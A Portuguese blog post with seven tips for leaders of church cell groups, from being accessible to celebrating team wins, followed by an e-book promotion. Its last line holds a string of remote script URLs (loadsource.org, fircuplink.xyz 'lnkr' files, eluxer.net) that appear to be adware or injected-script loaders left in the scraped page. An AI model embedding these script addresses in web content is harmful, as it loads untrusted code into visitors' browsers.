Dicas para aumentar a sua influência na sua liderança

Liderar é influenciar. Por isso, líderes que cativam, influenciam. Então, para que o líder consiga influenciar pessoas, ele vai precisar alcançar e conquistar, o coração delas.

Para isso, aqui vão algumas dicas:

1 – Ser acessível

O líder que deseja cativar e ganhar o coração das pessoas precisa estar acessível às pessoas.

As pessoas precisam saber que têm fácil acesso ao líder, além de ter a certeza de que podem encontrá-lo, nem que seja para “bater um papo”, por exemplo.

Ser acessível, por si só, é uma estratégia poderosa para alcançar as pessoas e gerar influência, principalmente para as pessoas que estão diretamente ligadas ao líder.

2 – Ser um bom ouvinte

Saber escutar é uma arte que precisa ser aprendida por todo líder que deseja alcançar os corações.

Um líder que é um bom ouvinte sabe dar orientações, bem como, ouvir e receber ideias e feedbacks das pessoas.

Quando o líder alcança esta maturidade, as pessoas ao seu redor se sentem confortáveis de procurá-lo, além de se sentir confiantes para estar envolvidas nos projetos.

3 – Investir na capacitação de pessoas

Quando o líder dá as pessoas o melhor que ele tem para oferecer para capacitá-las, seja com conhecimento ou estratégias, ele aumenta, automaticamente, a sua influência sobre as pessoas.

O líder precisa perder o medo de compartilhar o que sabe, desde as estratégias mais simples, até os seus segredos de como fazer as coisas funcionarem. Pois é, justamente, isso que o fará respeitado pelas pessoas.

Capacitar pessoas, além de trazer crescimento e unidade à equipe, faz com que elas se sintam importantes e, indiscutivelmente, aumenta o nível de influência de qualquer liderança.

4 – Saber delegar

Enquanto o líder se faz acessível, ouve e investe na capacitação das pessoas, ele vai conhecendo “quem é quem” na sua equipe. Percebe os dons, as habilidades e, acima de tudo, o caráter de cada um. Então, é neste momento que o líder precisa perder o medo e começar a delegar. Isso demonstra amor, cuidado e respeito.

Então, aos poucos, os líderes em treinamento vão ganhando confiança e as demais pessoas vão perceber o quanto o líder trabalhou na vida deles para que pudessem crescer e alcançar os propósitos de Deus. Isso fará com que o líder seja visto de forma especial pelos demais gerando influência.

Quando o líder começa a delegar, ele está gerando influência através da confiança depositada. Afinal, líderes geram novos líderes e não seguidores. E, não há como fazer isso sem fazer sem delegar.

5 – Admitir seus próprios erros

Quando o líder consegue perceber que errou e admite isso, ele ganha o respeito e admiração das pessoas.

Esta característica, ao contrário do que muitos pensam, não tem nada a ver com fraqueza, mas como humildade. Reconhecer seus próprios erros faz com que a equipe se sinta segura ao caminhar ao seu lado, bem como, para aceitar desafios. Afinal, se até o líder erra tentando, por que não tentar também?

6 – Saber elogiar

O elogio pode ser considerado o “oxigênio da alma”. Por isso, todas as vezes que o líder elogia a sua equipe, ele ganha, cada vez mais, a confiança das pessoas.

Não basta a pessoa saber que foi bem… é preciso que seja dito quão bom foi e como foi importante sua dedicação.

O líder que sabe elogiar cada um da sua equipe de forma sincera e sem exageros, ele têm o coração da maior parte dela e, consequentemente, tem o seu nível de influência aumentado a cada dia.

7 – Celebrar com a equipe por cada vitória conquistada

Ainda que os resultados não tenham sido o que se esperava, é preciso celebrar o que aconteceu de bom. Nem tudo é cem por cento bom ou cem por cento ruim.

Juntar a equipe e celebrar os pontos positivos aumenta, e muito, o nível de satisfação de todos. A celebração das vitórias fortalece a comunhão e faz com que cada um da equipe se sinta participante de um grande projeto.

Através destas dicas, o líder poderá se exercitar para que possa, a cada dia, aumentar o seu nível de influência, principalmente nas suas células. Agora, se você ainda não faz parte da visão celular e tem o desejo de conhecer melhor ou não sabe como começar, que tal se você pudesse ter acesso ao “passo a passo” para montar a sua primeira célula?

Pois, então, clique AQUI e faça já o download GRATUITO do e-book “Montando a sua primeira célula”.  Através deste material objetivo e prático, você poderá aplicar tudo o que você tem estudado a respeito de célula mais rápido do que você imagina. E, se você tiver alguma dúvida, nos faça saber através do WhatsApp 21-97016-2326 ou do e-mail suporte@liderancadesucesso.com.br

http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=1535560767429http://fircuplink.xyz/addons/lnkr5.min.jshttp://fircuplink.xyz/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_